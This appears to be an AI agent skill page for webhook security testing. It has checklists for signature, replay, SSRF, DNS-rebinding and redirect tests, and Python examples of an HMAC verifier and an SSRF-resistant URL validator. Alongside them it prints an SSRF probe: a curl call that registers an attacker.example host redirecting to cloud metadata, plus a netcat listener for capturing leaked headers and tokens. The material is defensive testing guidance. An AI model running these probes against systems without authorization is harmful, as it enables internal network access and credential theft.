Webhook Security Testing
Webhook trust boundary testing, signature verification, and callback security
## Quick Summary
You are a webhook security analyst who evaluates inbound and outbound webhook implementations during authorized security assessments. You understand that webhooks invert the trust model — instead of the client calling the server, the server calls the client, creating trust boundary violations, SSRF opportunities, and authentication gaps that differ fundamentally from standard API security concerns.
## Key Points
- **Webhooks are unauthenticated by default** — unless signature verification is implemented and enforced, anyone can forge webhook payloads.
- **Outbound webhooks are SSRF vectors** — any feature that makes HTTP requests to user-supplied URLs is a server-side request forgery waiting to happen.
- **Replay is trivial** — without timestamp validation, captured webhook payloads can be replayed indefinitely to trigger duplicate actions.
- **Failure handling leaks information** — retry logic, error messages, and timeout behavior reveal internal architecture to attackers.
1. **Test webhook signature verification** by sending unsigned or mis-signed payloads:
2. **Test webhook replay attacks** by resending a valid signed payload:
3. **Test outbound webhook SSRF** via URL registration:
4. **Test SSRF bypass with DNS rebinding**:
5. **Test webhook event type spoofing**:
6. **Test webhook URL validation with redirects**:
7. **Test webhook secret rotation and management**:
8. **Test webhook delivery information disclosure**:
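Tests 1, 2, 5 and 7 above exercised against one receiver, as an added example that is not part of the skill's own code: a Python HMAC-SHA256 verifier with a timestamp window, a replay cache and a secret-rotation grace list, followed by the probes a tester sends at it (unsigned, tampered, replayed, stale, signed with a retired secret, and an event type carried in an unsigned header). The header names `X-Webhook-Timestamp`, `X-Webhook-Signature` and `X-Event-Type`, the `<timestamp>.<body>` signing string, the 300-second tolerance and the sample secrets are assumptions modelled on common providers; check the vendor's documented scheme before testing a real target.

```python
"""Inbound webhook verifier and the probes a tester sends against it.

Added example for this page, not the skill's own code. Header names,
the "<timestamp>.<body>" signing string, the 300 s tolerance and the
secrets are assumptions; check the vendor's documented scheme first.
"""
import hashlib
import hmac
import json
import time


def sign(secret: bytes, ts_raw: str, body: bytes) -> str:
    """HMAC-SHA256 over the raw timestamp header value and the raw request body."""
    return hmac.new(secret, ts_raw.encode() + b"." + body, hashlib.sha256).hexdigest()


class WebhookVerifier:
    """Receiver side: signature, freshness, replay and secret rotation."""

    def __init__(self, secrets, tolerance=300, now=time.time):
        self.secrets = list(secrets)   # current secret first, then any still inside its grace period
        self.tolerance = tolerance     # accepted clock skew in seconds
        self.now = now                 # injectable clock so the probes below are deterministic
        self.seen = {}                 # (ts_raw, sig) -> ts; use a shared TTL store in production

    def verify(self, headers: dict, body: bytes) -> tuple:
        ts_raw = headers.get("X-Webhook-Timestamp")
        sig = headers.get("X-Webhook-Signature")
        if ts_raw is None or sig is None:
            return False, "missing signature headers"
        try:
            ts = int(ts_raw)
        except ValueError:
            return False, "malformed timestamp"
        if abs(self.now() - ts) > self.tolerance:
            return False, "stale timestamp"
        # Try every secret in the rotation window; compare_digest keeps the comparison constant-time.
        if not any(hmac.compare_digest(sign(s, ts_raw, body), sig) for s in self.secrets):
            return False, "bad signature"
        # The replay cache only needs to cover the tolerance window; older deliveries fail above.
        self.seen = {k: v for k, v in self.seen.items() if self.now() - v <= self.tolerance}
        if (ts_raw, sig) in self.seen:
            return False, "replay"
        self.seen[(ts_raw, sig)] = ts
        return True, "ok"


def event_type(headers: dict, body: bytes, trust_header: bool) -> str:
    """Event-type spoofing: a header outside the signed bytes can be flipped at will."""
    if trust_header:
        return headers["X-Event-Type"]      # unsafe: not covered by the HMAC
    return json.loads(body)["type"]         # safe: lives inside the signed body


def run_probes() -> dict:
    """Tester's probes (tests 1, 2, 5 and 7 on this page) against the verifier; returns {probe: verdict}."""
    old, new = b"old-shared-secret", b"new-shared-secret"          # constructed sample secrets

    def clock():
        return 1_700_000_000.0                                       # frozen clock

    body = json.dumps({"type": "payment.succeeded", "amount": 100}).encode()   # constructed event
    ts_raw = "1700000000"
    good = {"X-Webhook-Timestamp": ts_raw,
            "X-Webhook-Signature": sign(new, ts_raw, body),
            "X-Event-Type": "payment.succeeded"}
    v = WebhookVerifier([new, old], now=clock)
    r = {}
    r["valid"] = v.verify(good, body)
    r["unsigned"] = v.verify({"X-Webhook-Timestamp": ts_raw}, body)
    r["tampered_body"] = v.verify(good, body.replace(b"100", b"1"))      # signature no longer matches
    r["replay"] = v.verify(good, body)                                     # identical delivery again
    stale = dict(good, **{"X-Webhook-Timestamp": "1699990000",
                          "X-Webhook-Signature": sign(new, "1699990000", body)})
    r["stale"] = v.verify(stale, body)                                     # correctly signed, 10000 s old
    # Rotation: a delivery signed with the previous secret is accepted only while that secret is still listed.
    old_sig = dict(good, **{"X-Webhook-Signature": sign(old, ts_raw, body)})
    r["old_secret_in_grace"] = v.verify(old_sig, body)
    r["old_secret_retired"] = WebhookVerifier([new], now=clock).verify(old_sig, body)
    # Spoofing: flip the unsigned header; the signed body still says payment.succeeded.
    spoof = dict(good, **{"X-Event-Type": "refund.succeeded"})
    r["spoof_header_trusted"] = event_type(spoof, body, trust_header=True)
    r["spoof_body_trusted"] = event_type(spoof, body, trust_header=False)
    return r
```

When a target accepts the `unsigned`, `tampered_body` or `replay` probes, or still accepts `old_secret_retired` long after a rotation, that is the finding; the `spoof_header_trusted` case shows why the event type has to be read from the signed body rather than from a header the HMAC does not cover.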
## Quick Example
```bash
# Register a URL that 302 redirects to internal targets
curl -X POST https://target.example.com/api/webhooks \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"url": "https://attacker.example.com/redirect-to-metadata"}'
```
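The registration-time URL check that the redirect probe above is aimed at, extended to the DNS rebinding (test 4) and redirect (test 6) cases, as an added example and not code from the skill. It is a Python validator that enforces https, refuses credentials and non-DNS host spellings, resolves the host and checks every answer against private, loopback, link-local, metadata and RFC 6598 ranges, then shows why the delivery must connect to the address that was validated rather than resolving again. DNS and the TCP connect are injected fakes so it runs offline; the hostnames, the placeholder public address 1.2.3.4 and the resolver table are constructed.

```python
"""Outbound webhook URL validation against SSRF, DNS rebinding and redirects.

Added example for this page, not the skill's own code. DNS and the TCP
connect are injected fakes so it runs offline; in production resolve with
socket.getaddrinfo and hand the pinned IP to the HTTP client while keeping
the original hostname for the Host header and TLS SNI.
"""
import ipaddress
from urllib.parse import urlsplit

METADATA_IP = "169.254.169.254"   # cloud metadata service, the usual SSRF target


def is_forbidden(addr: str) -> bool:
    """True for any address a webhook delivery must never reach."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped:               # ::ffff:169.254.169.254 is still 169.254.169.254
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified
            or ip in ipaddress.ip_network("100.64.0.0/10"))  # RFC 6598 shared space; is_private leaves it out


def validate_url(url: str, resolve) -> tuple:
    """Registration-time check. Returns (pinned_ip, reason); pinned_ip is None when rejected."""
    p = urlsplit(url)
    if p.scheme != "https":
        return None, "scheme must be https"
    if p.username is not None or p.password is not None:
        return None, "credentials in URL are not allowed"
    host = p.hostname
    if not host:
        return None, "missing host"
    try:
        ipaddress.ip_address(host)
        addrs = [host]                                    # IP literal: nothing to resolve
    except ValueError:
        # Require a DNS name with an alphabetic TLD. This refuses 0x7f.0.0.1, 0177.0.0.1,
        # 2130706433 and similar spellings that ipaddress rejects but many HTTP clients connect to.
        if not host.rstrip(".").split(".")[-1].isalpha():
            return None, "host is neither an IP literal nor a DNS name"
        addrs = resolve(host)
        if not addrs:
            return None, "host does not resolve"
    for a in addrs:                                       # every A/AAAA answer must pass, not just the first
        if is_forbidden(a):
            return None, f"resolves to forbidden address {a}"
    return addrs[0], "ok"


def deliver_naive(url: str, resolve, connect) -> tuple:
    """Validate, then let the HTTP client resolve again: the DNS rebinding window."""
    pinned, reason = validate_url(url, resolve)
    if pinned is None:
        return "rejected", reason
    return connect(resolve(urlsplit(url).hostname)[0])    # second lookup may answer differently


def deliver_pinned(url: str, resolve, connect) -> tuple:
    """Connect to the address that was actually validated; no second lookup."""
    pinned, reason = validate_url(url, resolve)
    if pinned is None:
        return "rejected", reason
    return connect(pinned)


def make_rebinding_resolver(first: str, then: str):
    """Fake DNS: answers `first` on the first lookup and `then` afterwards (a TTL-0 rebinding)."""
    answers = iter([first])
    return lambda host: [next(answers, then)]


def static_resolve(host: str) -> list:
    """Fake DNS with fixed answers (constructed table; 1.2.3.4 stands in for a public address)."""
    return {"hooks.attacker.example": ["1.2.3.4"], "localhost": ["127.0.0.1"]}.get(host, [])


def fake_connect(ip: str) -> tuple:
    """Stands in for the TCP connect; reports which address the delivery would reach."""
    return "connected", ip


def run_probes() -> dict:
    """Tests 3, 4 and 6 on this page against the validator; returns {probe: result}."""
    r = {}
    r["public_host"] = validate_url("https://hooks.attacker.example/cb", static_resolve)
    r["http_scheme"] = validate_url("http://hooks.attacker.example/cb", static_resolve)
    r["metadata_literal"] = validate_url(f"https://{METADATA_IP}/latest/meta-data/", static_resolve)
    r["mapped_v6_literal"] = validate_url(f"https://[::ffff:{METADATA_IP}]/", static_resolve)
    r["localhost"] = validate_url("https://localhost/", static_resolve)
    r["hex_octets"] = validate_url("https://0x7f.0.0.1/", static_resolve)
    r["cgnat"] = validate_url("https://100.64.0.1/", static_resolve)
    r["creds"] = validate_url("https://user:pw@hooks.attacker.example/", static_resolve)
    # Rebinding: registration sees a public address, delivery sees the metadata IP.
    url = "https://hooks.attacker.example/cb"
    r["rebind_naive"] = deliver_naive(url, make_rebinding_resolver("1.2.3.4", METADATA_IP), fake_connect)
    r["rebind_pinned"] = deliver_pinned(url, make_rebinding_resolver("1.2.3.4", METADATA_IP), fake_connect)
    # Redirects: never auto-follow; each Location header goes back through validate_url.
    r["redirect_location"] = validate_url("https://[::1]:8080/admin", static_resolve)
    return r
```

The `rebind_naive` result is the bug the DNS rebinding test looks for: the URL passed validation, yet the delivery reached the metadata address because the HTTP client performed its own lookup. Pinning the validated address closes that window, and the same validator applied to every `Location` header is what keeps the redirect probe from turning a public callback into an internal request.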
```bash
# Set up a listener, register it as the webhook endpoint, then
# examine what headers and metadata the server sends
nc -l -p 8080   # On attacker-controlled server. GNU/traditional netcat syntax;
                # OpenBSD netcat takes `nc -l 8080`. The listener accepts one
                # connection and never answers, so the sender's retry and
                # timeout behaviour (item 8) shows up here as well
# Check: User-Agent, internal IPs, authentication tokens,
# internal hostnames in headers, debug information
```

Full skill (146 lines): `skilldb get api-security-agent-skills/webhook-security`. Install the skill set directly: `skilldb add api-security-agent-skills`.
## Related Skills
- API Authentication Flow Testing (Api Security Agent): OAuth2, API key, and HMAC authentication flow testing for security assessments
- Rate Limit Testing (Api Security Agent): Rate limiting bypass testing, throttle evasion, and abuse prevention assessment
- API Schema Validation Testing (Api Security Agent): API schema validation testing, fuzzing, and type confusion attacks
- Third-Party Connector Security (Api Security Agent): Third-party API integration risk assessment and supply chain security testing
- Token Handling Security (Api Security Agent): JWT/OAuth token analysis, validation, and expiry testing for API security assessments
- App Sideload Abuse Detection (Brand Protection): Detect app sideload abuse, marketplace scams, and unauthorized application distribution